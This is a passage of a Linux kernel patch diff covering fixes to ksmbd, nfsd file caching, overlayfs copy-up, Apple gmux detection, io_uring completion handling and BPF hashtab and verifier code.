+ 		client_sk->sk->sk_sndtimeo = KSMBD_TCP_SEND_TIMEOUT;
+@@ -368,6 +381,8 @@ static int ksmbd_tcp_writev(struct ksmbd_transport *t, struct kvec *iov,
+ static void ksmbd_tcp_disconnect(struct ksmbd_transport *t)
+ {
+ 	free_transport(TCP_TRANS(t));
++	if (server_conf.max_connections)
++		atomic_dec(&active_num_conn);
+ }
+ 
+ static void tcp_destroy_socket(struct socket *ksmbd_socket)
+diff --git a/fs/nfsd/filecache.c b/fs/nfsd/filecache.c
+index ea6fb0e6b1655..142b3c928f76e 100644
+--- a/fs/nfsd/filecache.c
++++ b/fs/nfsd/filecache.c
+@@ -638,6 +638,39 @@ static struct shrinker	nfsd_file_shrinker = {
+ 	.seeks = 1,
+ };
+ 
++/**
++ * nfsd_file_cond_queue - conditionally unhash and queue a nfsd_file
++ * @nf: nfsd_file to attempt to queue
++ * @dispose: private list to queue successfully-put objects
++ *
++ * Unhash an nfsd_file, try to get a reference to it, and then put that
++ * reference. If it's the last reference, queue it to the dispose list.
++ */
++static void
++nfsd_file_cond_queue(struct nfsd_file *nf, struct list_head *dispose)
++	__must_hold(RCU)
++{
++	int decrement = 1;
++
++	/* If we raced with someone else unhashing, ignore it */
++	if (!nfsd_file_unhash(nf))
++		return;
++
++	/* If we can't get a reference, ignore it */
++	if (!nfsd_file_get(nf))
++		return;
++
++	/* Extra decrement if we remove from the LRU */
++	if (nfsd_file_lru_remove(nf))
++		++decrement;
++
++	/* If refcount goes to 0, then put on the dispose list */
++	if (refcount_sub_and_test(decrement, &nf->nf_ref)) {
++		list_add(&nf->nf_lru, dispose);
++		trace_nfsd_file_closing(nf);
++	}
++}
++
+ /**
+  * nfsd_file_queue_for_close: try to close out any open nfsd_files for an inode
+  * @inode:   inode on which to close out nfsd_files
+@@ -665,30 +698,11 @@ nfsd_file_queue_for_close(struct inode *inode, struct list_head *dispose)
+ 
+ 	rcu_read_lock();
+ 	do {
+-		int decrement = 1;
+-
+ 		nf = rhashtable_lookup(&nfsd_file_rhash_tbl, &key,
+ 				       nfsd_file_rhash_params);
+ 		if (!nf)
+ 			break;
+-
+-		/* If we raced with someone else unhashing, ignore it */
+-		if (!nfsd_file_unhash(nf))
+-			continue;
+-
+-		/* If we can't get a reference, ignore it */
+-		if (!nfsd_file_get(nf))
+-			continue;
+-
+-		/* Extra decrement if we remove from the LRU */
+-		if (nfsd_file_lru_remove(nf))
+-			++decrement;
+-
+-		/* If refcount goes to 0, then put on the dispose list */
+-		if (refcount_sub_and_test(decrement, &nf->nf_ref)) {
+-			list_add(&nf->nf_lru, dispose);
+-			trace_nfsd_file_closing(nf);
+-		}
++		nfsd_file_cond_queue(nf, dispose);
+ 	} while (1);
+ 	rcu_read_unlock();
+ }
+@@ -905,11 +919,8 @@ __nfsd_file_cache_purge(struct net *net)
+ 
+ 		nf = rhashtable_walk_next(&iter);
+ 		while (!IS_ERR_OR_NULL(nf)) {
+-			if (!net || nf->nf_net == net) {
+-				nfsd_file_unhash(nf);
+-				nfsd_file_lru_remove(nf);
+-				list_add(&nf->nf_lru, &dispose);
+-			}
++			if (!net || nf->nf_net == net)
++				nfsd_file_cond_queue(nf, &dispose);
+ 			nf = rhashtable_walk_next(&iter);
+ 		}
+ 
+diff --git a/fs/nfsd/nfs4proc.c b/fs/nfsd/nfs4proc.c
+index 30a08ec31a703..ba04ce9b9fa51 100644
+--- a/fs/nfsd/nfs4proc.c
++++ b/fs/nfsd/nfs4proc.c
+@@ -1331,6 +1331,7 @@ try_again:
+ 			/* allow 20secs for mount/unmount for now - revisit */
+ 			if (signal_pending(current) ||
+ 					(schedule_timeout(20*HZ) == 0)) {
++				finish_wait(&nn->nfsd_ssc_waitq, &wait);
+ 				kfree(work);
+ 				return nfserr_eagain;
+ 			}
+diff --git a/fs/overlayfs/copy_up.c b/fs/overlayfs/copy_up.c
+index f436d8847f085..91a95bfad0d1c 100644
+--- a/fs/overlayfs/copy_up.c
++++ b/fs/overlayfs/copy_up.c
+@@ -754,7 +754,7 @@ static int ovl_copy_up_tmpfile(struct ovl_copy_up_ctx *c)
+ 	if (!c->metacopy && c->stat.size) {
+ 		err = ovl_copy_up_file(ofs, c->dentry, tmpfile, c->stat.size);
+ 		if (err)
+-			return err;
++			goto out_fput;
+ 	}
+ 
+ 	err = ovl_copy_up_metadata(c, temp);
+@@ -973,6 +973,10 @@ static int ovl_copy_up_one(struct dentry *parent, struct dentry *dentry,
+ 	if (err)
+ 		return err;
+ 
++	if (!kuid_has_mapping(current_user_ns(), ctx.stat.uid) ||
++	    !kgid_has_mapping(current_user_ns(), ctx.stat.gid))
++		return -EOVERFLOW;
++
+ 	ctx.metacopy = ovl_need_meta_copy_up(dentry, ctx.stat.mode, flags);
+ 
+ 	if (parent) {
+diff --git a/include/drm/drm_vma_manager.h b/include/drm/drm_vma_manager.h
+index 4f8c35206f7cd..6c2a2f21dbf00 100644
+--- a/include/drm/drm_vma_manager.h
++++ b/include/drm/drm_vma_manager.h
+@@ -74,6 +74,7 @@ void drm_vma_offset_remove(struct drm_vma_offset_manager *mgr,
+ 			   struct drm_vma_offset_node *node);
+ 
+ int drm_vma_node_allow(struct drm_vma_offset_node *node, struct drm_file *tag);
++int drm_vma_node_allow_once(struct drm_vma_offset_node *node, struct drm_file *tag);
+ void drm_vma_node_revoke(struct drm_vma_offset_node *node,
+ 			 struct drm_file *tag);
+ bool drm_vma_node_is_allowed(struct drm_vma_offset_node *node,
+diff --git a/include/linux/apple-gmux.h b/include/linux/apple-gmux.h
+index ddb10aa67b143..1f68b49bcd688 100644
+--- a/include/linux/apple-gmux.h
++++ b/include/linux/apple-gmux.h
+@@ -8,18 +8,118 @@
+ #define LINUX_APPLE_GMUX_H
+ 
+ #include <linux/acpi.h>
++#include <linux/io.h>
++#include <linux/pnp.h>
+ 
+ #define GMUX_ACPI_HID "APP000B"
+ 
++/*
++ * gmux port offsets. Many of these are not yet used, but may be in the
++ * future, and it's useful to have them documented here anyhow.
++ */
++#define GMUX_PORT_VERSION_MAJOR		0x04
++#define GMUX_PORT_VERSION_MINOR		0x05
++#define GMUX_PORT_VERSION_RELEASE	0x06
++#define GMUX_PORT_SWITCH_DISPLAY	0x10
++#define GMUX_PORT_SWITCH_GET_DISPLAY	0x11
++#define GMUX_PORT_INTERRUPT_ENABLE	0x14
++#define GMUX_PORT_INTERRUPT_STATUS	0x16
++#define GMUX_PORT_SWITCH_DDC		0x28
++#define GMUX_PORT_SWITCH_EXTERNAL	0x40
++#define GMUX_PORT_SWITCH_GET_EXTERNAL	0x41
++#define GMUX_PORT_DISCRETE_POWER	0x50
++#define GMUX_PORT_MAX_BRIGHTNESS	0x70
++#define GMUX_PORT_BRIGHTNESS		0x74
++#define GMUX_PORT_VALUE			0xc2
++#define GMUX_PORT_READ			0xd0
++#define GMUX_PORT_WRITE			0xd4
++
++#define GMUX_MIN_IO_LEN			(GMUX_PORT_BRIGHTNESS + 4)
++
+ #if IS_ENABLED(CONFIG_APPLE_GMUX)
++static inline bool apple_gmux_is_indexed(unsigned long iostart)
++{
++	u16 val;
++
++	outb(0xaa, iostart + 0xcc);
++	outb(0x55, iostart + 0xcd);
++	outb(0x00, iostart + 0xce);
++
++	val = inb(iostart + 0xcc) | (inb(iostart + 0xcd) << 8);
++	if (val == 0x55aa)
++		return true;
++
++	return false;
++}
+ 
+ /**
+- * apple_gmux_present() - detect if gmux is built into the machine
++ * apple_gmux_detect() - detect if gmux is built into the machine
++ *
++ * @pnp_dev:     Device to probe or NULL to use the first matching device
++ * @indexed_ret: Returns (by reference) if the gmux is indexed or not
++ *
++ * Detect if a supported gmux device is present by actually probing it.
++ * This avoids the false positives returned on some models by
++ * apple_gmux_present().
++ *
++ * Return: %true if a supported gmux ACPI device is detected and the kernel
++ * was configured with CONFIG_APPLE_GMUX, %false otherwise.
++ */
++static inline bool apple_gmux_detect(struct pnp_dev *pnp_dev, bool *indexed_ret)
++{
++	u8 ver_major, ver_minor, ver_release;
++	struct device *dev = NULL;
++	struct acpi_device *adev;
++	struct resource *res;
++	bool indexed = false;
++	bool ret = false;
++
++	if (!pnp_dev) {
++		adev = acpi_dev_get_first_match_dev(GMUX_ACPI_HID, NULL, -1);
++		if (!adev)
++			return false;
++
++		dev = get_device(acpi_get_first_physical_node(adev));
++		acpi_dev_put(adev);
++		if (!dev)
++			return false;
++
++		pnp_dev = to_pnp_dev(dev);
++	}
++
++	res = pnp_get_resource(pnp_dev, IORESOURCE_IO, 0);
++	if (!res || resource_size(res) < GMUX_MIN_IO_LEN)
++		goto out;
++
++	/*
++	 * Invalid version information may indicate either that the gmux
++	 * device isn't present or that it's a new one that uses indexed io.
++	 */
++	ver_major = inb(res->start + GMUX_PORT_VERSION_MAJOR);
++	ver_minor = inb(res->start + GMUX_PORT_VERSION_MINOR);
++	ver_release = inb(res->start + GMUX_PORT_VERSION_RELEASE);
++	if (ver_major == 0xff && ver_minor == 0xff && ver_release == 0xff) {
++		indexed = apple_gmux_is_indexed(res->start);
++		if (!indexed)
++			goto out;
++	}
++
++	if (indexed_ret)
++		*indexed_ret = indexed;
++
++	ret = true;
++out:
++	put_device(dev);
++	return ret;
++}
++
++/**
++ * apple_gmux_present() - check if gmux ACPI device is present
+  *
+  * Drivers may use this to activate quirks specific to dual GPU MacBook Pros
+  * and Mac Pros, e.g. for deferred probing, runtime pm and backlight.
+  *
+- * Return: %true if gmux is present and the kernel was configured
++ * Return: %true if gmux ACPI device is present and the kernel was configured
+  * with CONFIG_APPLE_GMUX, %false otherwise.
+  */
+ static inline bool apple_gmux_present(void)
+@@ -34,6 +134,11 @@ static inline bool apple_gmux_present(void)
+ 	return false;
+ }
+ 
++static inline bool apple_gmux_detect(struct pnp_dev *pnp_dev, bool *indexed_ret)
++{
++	return false;
++}
++
+ #endif /* !CONFIG_APPLE_GMUX */
+ 
+ #endif /* LINUX_APPLE_GMUX_H */
+diff --git a/include/linux/platform_data/x86/simatic-ipc.h b/include/linux/platform_data/x86/simatic-ipc.h
+index 632320ec8f082..a48bb52409777 100644
+--- a/include/linux/platform_data/x86/simatic-ipc.h
++++ b/include/linux/platform_data/x86/simatic-ipc.h
+@@ -32,7 +32,8 @@ enum simatic_ipc_station_ids {
+ 	SIMATIC_IPC_IPC477E = 0x00000A02,
+ 	SIMATIC_IPC_IPC127E = 0x00000D01,
+ 	SIMATIC_IPC_IPC227G = 0x00000F01,
+-	SIMATIC_IPC_IPC427G = 0x00001001,
++	SIMATIC_IPC_IPCBX_39A = 0x00001001,
++	SIMATIC_IPC_IPCPX_39A = 0x00001002,
+ };
+ 
+ static inline u32 simatic_ipc_get_station_id(u8 *data, int max_len)
+diff --git a/include/linux/thermal.h b/include/linux/thermal.h
+index 9ecc128944a19..5e093602e8fcd 100644
+--- a/include/linux/thermal.h
++++ b/include/linux/thermal.h
+@@ -100,6 +100,7 @@ struct thermal_cooling_device_ops {
+ struct thermal_cooling_device {
+ 	int id;
+ 	char *type;
++	unsigned long max_state;
+ 	struct device device;
+ 	struct device_node *np;
+ 	void *devdata;
+diff --git a/include/net/mac80211.h b/include/net/mac80211.h
+index ac2bad57933f8..72b739dc6d530 100644
+--- a/include/net/mac80211.h
++++ b/include/net/mac80211.h
+@@ -1827,8 +1827,6 @@ struct ieee80211_vif_cfg {
+  * @drv_priv: data area for driver use, will always be aligned to
+  *	sizeof(void \*).
+  * @txq: the multicast data TX queue (if driver uses the TXQ abstraction)
+- * @txqs_stopped: per AC flag to indicate that intermediate TXQs are stopped,
+- *	protected by fq->lock.
+  * @offload_flags: 802.3 -> 802.11 enapsulation offload flags, see
+  *	&enum ieee80211_offload_flags.
+  * @mbssid_tx_vif: Pointer to the transmitting interface if MBSSID is enabled.
+@@ -1857,8 +1855,6 @@ struct ieee80211_vif {
+ 	bool probe_req_reg;
+ 	bool rx_mcast_action_reg;
+ 
+-	bool txqs_stopped[IEEE80211_NUM_ACS];
+-
+ 	struct ieee80211_vif *mbssid_tx_vif;
+ 
+ 	/* must be last */
+diff --git a/include/net/sch_generic.h b/include/net/sch_generic.h
+index d5517719af4ef..af4aa66aaa4eb 100644
+--- a/include/net/sch_generic.h
++++ b/include/net/sch_generic.h
+@@ -1288,4 +1288,11 @@ void mq_change_real_num_tx(struct Qdisc *sch, unsigned int new_real_tx);
+ 
+ int sch_frag_xmit_hook(struct sk_buff *skb, int (*xmit)(struct sk_buff *skb));
+ 
++/* Make sure qdisc is no longer in SCHED state. */
++static inline void qdisc_synchronize(const struct Qdisc *q)
++{
++	while (test_bit(__QDISC_STATE_SCHED, &q->state))
++		msleep(1);
++}
++
+ #endif
+diff --git a/include/scsi/scsi_transport_iscsi.h b/include/scsi/scsi_transport_iscsi.h
+index cab52b0f11d0c..34c03707fb6ef 100644
+--- a/include/scsi/scsi_transport_iscsi.h
++++ b/include/scsi/scsi_transport_iscsi.h
+@@ -236,6 +236,14 @@ enum {
+ 	ISCSI_SESSION_FREE,
+ };
+ 
++enum {
++	ISCSI_SESSION_TARGET_UNBOUND,
++	ISCSI_SESSION_TARGET_ALLOCATED,
++	ISCSI_SESSION_TARGET_SCANNED,
++	ISCSI_SESSION_TARGET_UNBINDING,
++	ISCSI_SESSION_TARGET_MAX,
++};
++
+ #define ISCSI_MAX_TARGET -1
+ 
+ struct iscsi_cls_session {
+@@ -264,6 +272,7 @@ struct iscsi_cls_session {
+ 	 */
+ 	pid_t creator;
+ 	int state;
++	int target_state;			/* session target bind state */
+ 	int sid;				/* session id */
+ 	void *dd_data;				/* LLD private data */
+ 	struct device dev;	/* sysfs transport/container device */
+diff --git a/include/uapi/linux/netfilter/nf_conntrack_sctp.h b/include/uapi/linux/netfilter/nf_conntrack_sctp.h
+index edc6ddab0de6a..2d6f80d75ae74 100644
+--- a/include/uapi/linux/netfilter/nf_conntrack_sctp.h
++++ b/include/uapi/linux/netfilter/nf_conntrack_sctp.h
+@@ -15,7 +15,7 @@ enum sctp_conntrack {
+ 	SCTP_CONNTRACK_SHUTDOWN_RECD,
+ 	SCTP_CONNTRACK_SHUTDOWN_ACK_SENT,
+ 	SCTP_CONNTRACK_HEARTBEAT_SENT,
+-	SCTP_CONNTRACK_HEARTBEAT_ACKED,
++	SCTP_CONNTRACK_HEARTBEAT_ACKED,	/* no longer used */
+ 	SCTP_CONNTRACK_MAX
+ };
+ 
+diff --git a/include/uapi/linux/netfilter/nfnetlink_cttimeout.h b/include/uapi/linux/netfilter/nfnetlink_cttimeout.h
+index 6b20fb22717b2..aa805e6d4e284 100644
+--- a/include/uapi/linux/netfilter/nfnetlink_cttimeout.h
++++ b/include/uapi/linux/netfilter/nfnetlink_cttimeout.h
+@@ -94,7 +94,7 @@ enum ctattr_timeout_sctp {
+ 	CTA_TIMEOUT_SCTP_SHUTDOWN_RECD,
+ 	CTA_TIMEOUT_SCTP_SHUTDOWN_ACK_SENT,
+ 	CTA_TIMEOUT_SCTP_HEARTBEAT_SENT,
+-	CTA_TIMEOUT_SCTP_HEARTBEAT_ACKED,
++	CTA_TIMEOUT_SCTP_HEARTBEAT_ACKED, /* no longer used */
+ 	__CTA_TIMEOUT_SCTP_MAX
+ };
+ #define CTA_TIMEOUT_SCTP_MAX (__CTA_TIMEOUT_SCTP_MAX - 1)
+diff --git a/include/ufs/ufshcd.h b/include/ufs/ufshcd.h
+index 9f28349ebcff5..2bb89290da63c 100644
+--- a/include/ufs/ufshcd.h
++++ b/include/ufs/ufshcd.h
+@@ -806,6 +806,7 @@ struct ufs_hba_monitor {
+  * @urgent_bkops_lvl: keeps track of urgent bkops level for device
+  * @is_urgent_bkops_lvl_checked: keeps track if the urgent bkops level for
+  *  device is known or not.
++ * @wb_mutex: used to serialize devfreq and sysfs write booster toggling
+  * @clk_scaling_lock: used to serialize device commands and clock scaling
+  * @desc_size: descriptor sizes reported by device
+  * @scsi_block_reqs_cnt: reference counting for scsi block requests
+@@ -948,6 +949,7 @@ struct ufs_hba {
+ 	enum bkops_status urgent_bkops_lvl;
+ 	bool is_urgent_bkops_lvl_checked;
+ 
++	struct mutex wb_mutex;
+ 	struct rw_semaphore clk_scaling_lock;
+ 	unsigned char desc_size[QUERY_DESC_IDN_MAX];
+ 	atomic_t scsi_block_reqs_cnt;
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index cea5de98c4232..862e05e6691de 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -823,15 +823,19 @@ bool io_post_aux_cqe(struct io_ring_ctx *ctx,
+ 	return filled;
+ }
+ 
+-static void __io_req_complete_put(struct io_kiocb *req)
++void io_req_complete_post(struct io_kiocb *req)
+ {
++	struct io_ring_ctx *ctx = req->ctx;
++
++	io_cq_lock(ctx);
++	if (!(req->flags & REQ_F_CQE_SKIP))
++		__io_fill_cqe_req(ctx, req);
++
+ 	/*
+ 	 * If we're the last reference to this request, add to our locked
+ 	 * free_list cache.
+ 	 */
+ 	if (req_ref_put_and_test(req)) {
+-		struct io_ring_ctx *ctx = req->ctx;
+-
+ 		if (req->flags & IO_REQ_LINK_FLAGS) {
+ 			if (req->flags & IO_DISARM_MASK)
+ 				io_disarm_next(req);
+@@ -852,21 +856,6 @@ static void __io_req_complete_put(struct io_kiocb *req)
+ 		wq_list_add_head(&req->comp_list, &ctx->locked_free_list);
+ 		ctx->locked_free_nr++;
+ 	}
+-}
+-
+-void __io_req_complete_post(struct io_kiocb *req)
+-{
+-	if (!(req->flags & REQ_F_CQE_SKIP))
+-		__io_fill_cqe_req(req->ctx, req);
+-	__io_req_complete_put(req);
+-}
+-
+-void io_req_complete_post(struct io_kiocb *req)
+-{
+-	struct io_ring_ctx *ctx = req->ctx;
+-
+-	io_cq_lock(ctx);
+-	__io_req_complete_post(req);
+ 	io_cq_unlock_post(ctx);
+ }
+ 
+@@ -876,9 +865,12 @@ inline void __io_req_complete(struct io_kiocb *req, unsigned issue_flags)
+ }
+ 
+ void io_req_complete_failed(struct io_kiocb *req, s32 res)
++	__must_hold(&ctx->uring_lock)
+ {
+ 	const struct io_op_def *def = &io_op_defs[req->opcode];
+ 
++	lockdep_assert_held(&req->ctx->uring_lock);
++
+ 	req_set_fail(req);
+ 	io_req_set_res(req, res, io_put_kbuf(req, IO_URING_F_UNLOCKED));
+ 	if (def->fail)
+@@ -1133,7 +1125,7 @@ static void io_req_local_work_add(struct io_kiocb *req)
+ 	percpu_ref_put(&ctx->refs);
+ }
+ 
+-static inline void __io_req_task_work_add(struct io_kiocb *req, bool allow_local)
++void __io_req_task_work_add(struct io_kiocb *req, bool allow_local)
+ {
+ 	struct io_uring_task *tctx = req->task->io_uring;
+ 	struct io_ring_ctx *ctx = req->ctx;
+@@ -1165,11 +1157,6 @@ static inline void __io_req_task_work_add(struct io_kiocb *req, bool allow_local
+ 	}
+ }
+ 
+-void io_req_task_work_add(struct io_kiocb *req)
+-{
+-	__io_req_task_work_add(req, true);
+-}
+-
+ static void __cold io_move_task_work_from_local(struct io_ring_ctx *ctx)
+ {
+ 	struct llist_node *node;
+@@ -1243,18 +1230,6 @@ int io_run_local_work(struct io_ring_ctx *ctx)
+ 	return ret;
+ }
+ 
+-static void io_req_tw_post(struct io_kiocb *req, bool *locked)
+-{
+-	io_req_complete_post(req);
+-}
+-
+-void io_req_tw_post_queue(struct io_kiocb *req, s32 res, u32 cflags)
+-{
+-	io_req_set_res(req, res, cflags);
+-	req->io_task_work.func = io_req_tw_post;
+-	io_req_task_work_add(req);
+-}
+-
+ static void io_req_task_cancel(struct io_kiocb *req, bool *locked)
+ {
+ 	/* not needed for normal modes, but SQPOLL depends on it */
+@@ -1641,6 +1616,7 @@ static u32 io_get_sequence(struct io_kiocb *req)
+ }
+ 
+ static __cold void io_drain_req(struct io_kiocb *req)
++	__must_hold(&ctx->uring_lock)
+ {
+ 	struct io_ring_ctx *ctx = req->ctx;
+ 	struct io_defer_entry *de;
+@@ -1658,17 +1634,12 @@ queue:
+ 	}
+ 	spin_unlock(&ctx->completion_lock);
+ 
+-	ret = io_req_prep_async(req);
+-	if (ret) {
+-fail:
+-		io_req_complete_failed(req, ret);
+-		return;
+-	}
+ 	io_prep_async_link(req);
+ 	de = kmalloc(sizeof(*de), GFP_KERNEL);
+ 	if (!de) {
+ 		ret = -ENOMEM;
+-		goto fail;
++		io_req_complete_failed(req, ret);
++		return;
+ 	}
+ 
+ 	spin_lock(&ctx->completion_lock);
+@@ -1942,13 +1913,16 @@ static void io_queue_sqe_fallback(struct io_kiocb *req)
+ 		req->flags &= ~REQ_F_HARDLINK;
+ 		req->flags |= REQ_F_LINK;
+ 		io_req_complete_failed(req, req->cqe.res);
+-	} else if (unlikely(req->ctx->drain_active)) {
+-		io_drain_req(req);
+ 	} else {
+ 		int ret = io_req_prep_async(req);
+ 
+-		if (unlikely(ret))
++		if (unlikely(ret)) {
+ 			io_req_complete_failed(req, ret);
++			return;
++		}
++
++		if (unlikely(req->ctx->drain_active))
++			io_drain_req(req);
+ 		else
+ 			io_queue_iowq(req, NULL);
+ 	}
+@@ -2877,7 +2851,7 @@ static __cold bool io_cancel_defer_files(struct io_ring_ctx *ctx,
+ 	while (!list_empty(&list)) {
+ 		de = list_first_entry(&list, struct io_defer_entry, list);
+ 		list_del_init(&de->list);
+-		io_req_complete_failed(de->req, -ECANCELED);
++		io_req_task_queue_fail(de->req, -ECANCELED);
+ 		kfree(de);
+ 	}
+ 	return true;
+diff --git a/io_uring/io_uring.h b/io_uring/io_uring.h
+index 4334cd30c423d..90b675c65b840 100644
+--- a/io_uring/io_uring.h
++++ b/io_uring/io_uring.h
+@@ -33,7 +33,6 @@ int io_run_local_work(struct io_ring_ctx *ctx);
+ void io_req_complete_failed(struct io_kiocb *req, s32 res);
+ void __io_req_complete(struct io_kiocb *req, unsigned issue_flags);
+ void io_req_complete_post(struct io_kiocb *req);
+-void __io_req_complete_post(struct io_kiocb *req);
+ bool io_post_aux_cqe(struct io_ring_ctx *ctx, u64 user_data, s32 res, u32 cflags,
+ 		     bool allow_overflow);
+ bool io_fill_cqe_aux(struct io_ring_ctx *ctx, u64 user_data, s32 res, u32 cflags,
+@@ -51,10 +50,9 @@ static inline bool io_req_ffs_set(struct io_kiocb *req)
+ 	return req->flags & REQ_F_FIXED_FILE;
+ }
+ 
++void __io_req_task_work_add(struct io_kiocb *req, bool allow_local);
+ bool io_is_uring_fops(struct file *file);
+ bool io_alloc_async_data(struct io_kiocb *req);
+-void io_req_task_work_add(struct io_kiocb *req);
+-void io_req_tw_post_queue(struct io_kiocb *req, s32 res, u32 cflags);
+ void io_req_task_queue(struct io_kiocb *req);
+ void io_queue_iowq(struct io_kiocb *req, bool *dont_use);
+ void io_req_task_complete(struct io_kiocb *req, bool *locked);
+@@ -83,6 +81,11 @@ bool __io_alloc_req_refill(struct io_ring_ctx *ctx);
+ bool io_match_task_safe(struct io_kiocb *head, struct task_struct *task,
+ 			bool cancel_all);
+ 
++static inline void io_req_task_work_add(struct io_kiocb *req)
++{
++	__io_req_task_work_add(req, true);
++}
++
+ #define io_for_each_link(pos, head) \
+ 	for (pos = (head); pos; pos = pos->link)
+ 
+@@ -376,4 +379,11 @@ static inline bool io_allowed_run_tw(struct io_ring_ctx *ctx)
+ 		      ctx->submitter_task == current);
+ }
+ 
++static inline void io_req_queue_tw_complete(struct io_kiocb *req, s32 res)
++{
++	io_req_set_res(req, res, 0);
++	req->io_task_work.func = io_req_task_complete;
++	io_req_task_work_add(req);
++}
++
+ #endif
+diff --git a/io_uring/msg_ring.c b/io_uring/msg_ring.c
+index a49ccab262d53..7d5b544cfc305 100644
+--- a/io_uring/msg_ring.c
++++ b/io_uring/msg_ring.c
+@@ -30,6 +30,8 @@ static int io_msg_ring_data(struct io_kiocb *req)
+ 
+ 	if (msg->src_fd || msg->dst_fd || msg->flags)
+ 		return -EINVAL;
++	if (target_ctx->flags & IORING_SETUP_R_DISABLED)
++		return -EBADFD;
+ 
+ 	if (io_post_aux_cqe(target_ctx, msg->user_data, msg->len, 0, true))
+ 		return 0;
+@@ -84,6 +86,8 @@ static int io_msg_send_fd(struct io_kiocb *req, unsigned int issue_flags)
+ 
+ 	if (target_ctx == ctx)
+ 		return -EINVAL;
++	if (target_ctx->flags & IORING_SETUP_R_DISABLED)
++		return -EBADFD;
+ 
+ 	ret = io_double_lock_ctx(ctx, target_ctx, issue_flags);
+ 	if (unlikely(ret))
+diff --git a/io_uring/net.c b/io_uring/net.c
+index bdd2b4e370b35..9046e269e5a58 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -62,6 +62,7 @@ struct io_sr_msg {
+ 	u16				flags;
+ 	/* initialised and used only by !msg send variants */
+ 	u16				addr_len;
++	u16				buf_group;
+ 	void __user			*addr;
+ 	/* used only for send zerocopy */
+ 	struct io_kiocb 		*notif;
+@@ -565,6 +566,15 @@ int io_recvmsg_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ 		if (req->opcode == IORING_OP_RECV && sr->len)
+ 			return -EINVAL;
+ 		req->flags |= REQ_F_APOLL_MULTISHOT;
++		/*
++		 * Store the buffer group for this multishot receive separately,
++		 * as if we end up doing an io-wq based issue that selects a
++		 * buffer, it has to be committed immediately and that will
++		 * clear ->buf_list. This means we lose the link to the buffer
++		 * list, and the eventual buffer put on completion then cannot
++		 * restore it.
++		 */
++		sr->buf_group = req->buf_index;
+ 	}
+ 
+ #ifdef CONFIG_COMPAT
+@@ -581,6 +591,7 @@ static inline void io_recv_prep_retry(struct io_kiocb *req)
+ 
+ 	sr->done_io = 0;
+ 	sr->len = 0; /* get from the provided buffer */
++	req->buf_index = sr->buf_group;
+ }
+ 
+ /*
+diff --git a/io_uring/timeout.c b/io_uring/timeout.c
+index 06200fe73a044..4c6a5666541cf 100644
+--- a/io_uring/timeout.c
++++ b/io_uring/timeout.c
+@@ -63,7 +63,7 @@ static bool io_kill_timeout(struct io_kiocb *req, int status)
+ 		atomic_set(&req->ctx->cq_timeouts,
+ 			atomic_read(&req->ctx->cq_timeouts) + 1);
+ 		list_del_init(&timeout->list);
+-		io_req_tw_post_queue(req, status, 0);
++		io_req_queue_tw_complete(req, status);
+ 		return true;
+ 	}
+ 	return false;
+@@ -161,7 +161,7 @@ void io_disarm_next(struct io_kiocb *req)
+ 		req->flags &= ~REQ_F_ARM_LTIMEOUT;
+ 		if (link && link->opcode == IORING_OP_LINK_TIMEOUT) {
+ 			io_remove_next_linked(req);
+-			io_req_tw_post_queue(link, -ECANCELED, 0);
++			io_req_queue_tw_complete(link, -ECANCELED);
+ 		}
+ 	} else if (req->flags & REQ_F_LINK_TIMEOUT) {
+ 		struct io_ring_ctx *ctx = req->ctx;
+@@ -170,7 +170,7 @@ void io_disarm_next(struct io_kiocb *req)
+ 		link = io_disarm_linked_timeout(req);
+ 		spin_unlock_irq(&ctx->timeout_lock);
+ 		if (link)
+-			io_req_tw_post_queue(link, -ECANCELED, 0);
++			io_req_queue_tw_complete(link, -ECANCELED);
+ 	}
+ 	if (unlikely((req->flags & REQ_F_FAIL) &&
+ 		     !(req->flags & REQ_F_HARDLINK)))
+@@ -284,11 +284,11 @@ static void io_req_task_link_timeout(struct io_kiocb *req, bool *locked)
+ 			ret = io_try_cancel(req->task->io_uring, &cd, issue_flags);
+ 		}
+ 		io_req_set_res(req, ret ?: -ETIME, 0);
+-		io_req_complete_post(req);
++		io_req_task_complete(req, locked);
+ 		io_put_req(prev);
+ 	} else {
+ 		io_req_set_res(req, -ETIME, 0);
+-		io_req_complete_post(req);
++		io_req_task_complete(req, locked);
+ 	}
+ }
+ 
+diff --git a/kernel/bpf/hashtab.c b/kernel/bpf/hashtab.c
+index f39ee3e055897..c4811984fafa4 100644
+--- a/kernel/bpf/hashtab.c
++++ b/kernel/bpf/hashtab.c
+@@ -152,7 +152,7 @@ static inline int htab_lock_bucket(const struct bpf_htab *htab,
+ {
+ 	unsigned long flags;
+ 
+-	hash = hash & HASHTAB_MAP_LOCK_MASK;
++	hash = hash & min_t(u32, HASHTAB_MAP_LOCK_MASK, htab->n_buckets - 1);
+ 
+ 	preempt_disable();
+ 	if (unlikely(__this_cpu_inc_return(*(htab->map_locked[hash])) != 1)) {
+@@ -171,7 +171,7 @@ static inline void htab_unlock_bucket(const struct bpf_htab *htab,
+ 				      struct bucket *b, u32 hash,
+ 				      unsigned long flags)
+ {
+-	hash = hash & HASHTAB_MAP_LOCK_MASK;
++	hash = hash & min_t(u32, HASHTAB_MAP_LOCK_MASK, htab->n_buckets - 1);
+ 	raw_spin_unlock_irqrestore(&b->raw_lock, flags);
+ 	__this_cpu_dec(*(htab->map_locked[hash]));
+ 	preempt_enable();
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index b4d5b343c1912..398a0008aff72 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -3063,7 +3063,9 @@ static int check_stack_write_fixed_off(struct bpf_verifier_env *env,
+ 		bool sanitize = reg && is_spillable_regtype(reg->type);
+ 
+ 		for (i = 0; i < size; i++) {
+-			if (state->stack[spi].slot_type[i] == STACK_INVALID) {
++			u8 type = state->stack[spi].slot_type[i];
++
++			if (type != STACK_MISC && type != STACK_ZERO) {
+ 				sanitize = true;
+ 				break;
+ 			}
+diff --git a/kernel/kcsan/kcsan_test.c b/kernel/kcsan/kcsan_test.c
+index dcec1b743c694..a60c561724be9 100644
+--- a/kernel/kcsan/kcsan_test.c
++++ b/kernel/kcsan/kcsan_test.c
+@@ -159,7 +159,7 @@ static bool __report_matches(const struct expect_report *r)
+ 	const bool is_assert = (r->access[0].type | r->access[1].type) & KCSAN_ACCESS_ASSERT;
+ 	bool ret = false;
+ 	unsigned long flags;
